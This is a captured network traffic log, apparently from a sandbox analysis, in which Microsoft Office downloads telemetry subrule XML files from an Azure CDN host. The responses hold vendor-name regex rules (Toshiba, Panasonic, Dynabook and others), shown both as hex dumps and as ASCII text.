Accept-Ranges: bytes
2024-10-30 02:55:43 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
30192.168.2.55253413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:43 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:43 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:43 GMT
Content-Type: text/xml
Content-Length: 471
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
ETag: "0x8DC582BB5815C4C"
x-ms-request-id: deaa19c2-701e-006f-33de-26afc4000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025543Z-r197bdfb6b46kmj4701qkq602400000006n000000000471h
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:43 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
31192.168.2.55253813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:44 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:44 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:44 GMT
Content-Type: text/xml
Content-Length: 420
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
ETag: "0x8DC582B9DAE3EC0"
x-ms-request-id: 892d3b27-201e-005d-7649-27afb3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025544Z-16849878b78j7llf5vkyvvcehs00000008dg00000000rumm
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:44 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


Session IDSource IPSource PortDestination IPDestination Port
32192.168.2.55253913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:44 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:44 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:44 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
ETag: "0x8DC582B9D43097E"
x-ms-request-id: d63b5638-a01e-0021-2ab4-27814c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025544Z-16849878b78g2m84h2v9sta29000000006bg000000009sxp
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:44 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
33192.168.2.55254013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:44 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:44 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:44 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
ETag: "0x8DC582B92FCB436"
x-ms-request-id: baee9024-801e-00ac-4757-29fd65000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025544Z-17c5cb586f6fqqst87nqkbsx1c00000005yg000000002cr3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:44 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
34192.168.2.55254113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:44 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:44 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:44 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
ETag: "0x8DC582BA909FA21"
x-ms-request-id: c9fe3c14-601e-0050-50d7-262c9c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025544Z-16849878b78j5kdg3dndgqw0vg000000091000000000snpm
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:44 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session IDSource IPSource PortDestination IPDestination Port
35192.168.2.55254213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:44 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:44 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:44 GMT
Content-Type: text/xml
Content-Length: 423
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
ETag: "0x8DC582BB7564CE8"
x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025544Z-16849878b785jrf8dn0d2rczaw00000008q00000000012sf
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:44 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


Session IDSource IPSource PortDestination IPDestination Port
36192.168.2.55254313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:45 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:45 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:45 GMT
Content-Type: text/xml
Content-Length: 478
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
ETag: "0x8DC582B9B233827"
x-ms-request-id: a5807169-a01e-0032-6664-271949000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025545Z-17c5cb586f65j4snvy39m6qus400000002qg00000000b774
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:45 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
37192.168.2.55254513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:45 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:45 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:45 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
ETag: "0x8DC582BB046B576"
x-ms-request-id: 0ce3105a-501e-0029-7cd2-26d0b8000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025545Z-16849878b78xblwksrnkakc08w00000006p000000000er54
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:45 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
38192.168.2.55254413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:45 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:45 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:45 GMT
Content-Type: text/xml
Content-Length: 404
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
ETag: "0x8DC582B95C61A3C"
x-ms-request-id: a783173c-501e-008c-2349-27cd39000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025545Z-16849878b7898p5f6vryaqvp58000000084000000000xptt
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:45 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


Session IDSource IPSource PortDestination IPDestination Port
39192.168.2.55254613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:45 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:45 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:45 GMT
Content-Type: text/xml
Content-Length: 400
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
ETag: "0x8DC582BB2D62837"
x-ms-request-id: a96fbf53-401e-0016-5d5d-2653e0000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025545Z-16849878b78wv88bk51myq5vxc00000007p000000000kqm5
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:45 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


Session IDSource IPSource PortDestination IPDestination Port
40192.168.2.55254713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:45 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:45 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:45 GMT
Content-Type: text/xml
Content-Length: 479
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
ETag: "0x8DC582BB7D702D0"
x-ms-request-id: b2eb4648-201e-0051-526d-287340000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025545Z-17c5cb586f6gkqkwd0x1ge8t0400000007vg00000000fg9r
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:45 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
41192.168.2.55254913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:46 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:46 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:46 GMT
Content-Type: text/xml
Content-Length: 425
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
ETag: "0x8DC582BBA25094F"
x-ms-request-id: 2b9d96d3-301e-0020-4e31-276299000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025546Z-16849878b78fssff8btnns3b1400000007pg00000000h5ye
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
